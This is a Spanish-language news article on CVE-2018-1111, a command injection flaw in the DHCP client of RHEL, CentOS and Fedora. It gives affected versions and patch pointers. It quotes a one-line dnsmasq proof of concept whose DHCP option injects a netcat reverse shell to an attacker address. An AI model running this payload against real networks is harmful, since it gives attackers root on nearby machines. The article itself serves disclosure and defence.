Administradores Linux: La vulnerabilidad Dire da acceso de root a los atacantes en RHEL, CentOS y Fedora

Se ha descubierto una vulnerabilidad de inyección de comandos en el cliente del Protocolo de configuración dinámica de host (DHCP) incluido en Red Hat Enterprise Linux, que permitiría ejecutar un agente malicioso capaz de configurar un servidor DHCP o capaz de falsificar respuestas DHCP en una red local. comandos con privilegios de root.

La vulnerabilidad, designada como CVE-2018-1111 por Red Hat, fue descubierta por el ingeniero de Google, Felix Wilhelm, quien señaló que el código de prueba de explotación es lo suficientemente pequeño como para caber en un tweet.

#CVE-2018-1111 PoC 

dnsmasq --interface=eth0 --bind-interfaces  --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" 

Red Hat lo considera una vulnerabilidad crítica, como se señala en el informe de errores, lo que indica que puede ser fácilmente explotado por un atacante remoto no autenticado.

DHCP se usa para asignar una dirección IP, servidores DNS y otros atributos de configuración de red a dispositivos en una red. DHCP se utiliza en redes cableadas e inalámbricas. Dado que los requisitos para aprovechar este exploit son simplemente estar en la misma red, esta vulnerabilidad sería particularmente preocupante en los sistemas que probablemente estén conectados a redes Wi-Fi abiertas que no sean de confianza, que es más probable que afecten a los usuarios de Fedora en las computadoras portátiles.

En última instancia, cualquier red no segregada que permita que los dispositivos se unan sin la aprobación explícita del administrador (que sin dudas es el punto de habilitar DHCP para empezar) es en última instancia un riesgo.

Este error afecta a RHEL 6.x y 7x, así como a CentOS 6.x y 7.x, y a Fedora 26, 27, 28 y Rawhide. Es probable que otros sistemas operativos construidos sobre Fedora / RHEL se vean afectados, incluidos los sistemas ClearOS y Oracle Linux de HPE, así como el sistema Korora Linux recientemente descontinuado. Debido a que el problema se relaciona con una secuencia de comandos de integración de NetworkManager, es poco probable que afecte las distribuciones de Linux que no están relacionadas con Fedora o RHEL. RHEL 5 no se ve afectado.

Las instrucciones de parche están disponibles para los usuarios de Red Hat aquí, y aquí para los usuarios de Fedora. Oracle también ha emitido un aviso.